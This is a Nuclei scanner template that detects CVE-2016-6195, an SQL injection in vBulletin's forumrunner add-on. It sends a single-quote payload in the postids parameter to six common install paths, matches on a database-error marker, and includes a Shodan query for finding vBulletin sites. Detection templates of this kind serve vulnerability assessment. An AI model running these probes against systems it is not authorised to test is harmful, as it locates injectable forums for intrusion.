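# Nuclei HTTP template: error-based detection of CVE-2016-6195, a SQL
# injection in the forumrunner add-on of vBulletin (see info.description).
# Each request carries a single trailing quote (%27) in `postids`, and the
# matchers look for the resulting database-error marker. No extractor is
# defined, so nothing is pulled out of the response.
id: CVE-2016-6195

info:
  name: vBulletin <= 4.2.3 - SQL Injection
  author: MaStErChO
  severity: critical
  description: |
    vBulletin versions 3.6.0 through 4.2.3 are vulnerable to an SQL injection vulnerability in the vBulletin core forumrunner addon. The vulnerability allows an attacker to execute arbitrary SQL queries and potentially access sensitive information from the database.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system.
  remediation: |
    Upgrade to a patched version of vBulletin (4.2.4 or later) or apply the official patch provided by the vendor.
  reference:
    - https://www.cvedetails.com/cve/CVE-2016-6195/
    - https://www.exploit-db.com/exploits/38489
    - https://enumerated.wordpress.com/2016/07/11/1/
    # NOTE(review): this reference is plain http; prefer an https link if the
    # site serves one.
    - http://www.vbulletin.org/forum/showthread.php?t=322848
    - https://github.com/drewlong/vbully
  classification:
    # CVSS 3.0 vector: network-reachable, low complexity, no privileges and no
    # user interaction required.
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2016-6195
    cwe-id: CWE-89
    # EPSS values are a snapshot from when the template was generated; refresh
    # them before using them for prioritisation.
    epss-score: 0.00284
    epss-percentile: 0.65416
    # NOTE(review): the CPE pins `patch_level_4`, while the description covers
    # 3.6.0 through 4.2.3 - confirm asset matching does not miss other
    # affected builds.
    cpe: cpe:2.3:a:vbulletin:vbulletin:*:patch_level_4:*:*:*:*:*:*
  metadata:
    verified: "true"
    # Six requests at most: one per candidate install path listed below.
    max-request: 6
    vendor: vbulletin
    product: vbulletin
    shodan-query: title:"Powered By vBulletin"
  tags: cve2016,cve,vbulletin,sqli,forum,edb

http:
  - method: GET
    # The same endpoint is tried under six common install prefixes.
    # Defenders: this request shape is also what to look for in web-server
    # logs - forumrunner/request.php with cmd=get_spam_data and a `postids`
    # value containing a quote (presumably the parameter is meant to be
    # numeric; verify against the application).
    path:
      - "{{BaseURL}}/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"
      - "{{BaseURL}}/boards/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"
      - "{{BaseURL}}/board/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"
      - "{{BaseURL}}/forum/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"
      - "{{BaseURL}}/forums/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"
      - "{{BaseURL}}/vb/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"

    # Stop probing further prefixes once one path has matched.
    stop-at-first-match: true

    # Both matchers below must hold for a finding.
    matchers-condition: and
    matchers:
      # Marker string expected in the database-error response body.
      # NOTE(review): this is a single short string; a finding shows that a
      # DB error page was rendered, so confirm the installed version before
      # reporting the host as vulnerable.
      - type: word
        part: body
        words:
          - "type=dberror"

      # Either status is accepted.
      # NOTE(review): presumably the error page can be served with 200 or
      # 503 depending on configuration - confirm on a test instance.
      - type: status
        status:
          - 200
          - 503
        condition: or
# NOTE(review): the digest below is the signature comment appended when the
# template was signed. Any edit to the template, presumably including the
# comments added here, invalidates it - re-sign before relying on signature
# verification.
# digest: 4a0a0047304502201d3f5505147a2436c4abe3f1c341fe209327797eb297587bf15a68c5321be2fc0221009002c5c228d53f60792cc0d97f32e82d17c7d571d4d3dfb92f8ec731df341e55:922c64590222798bb761d5b6d8e72950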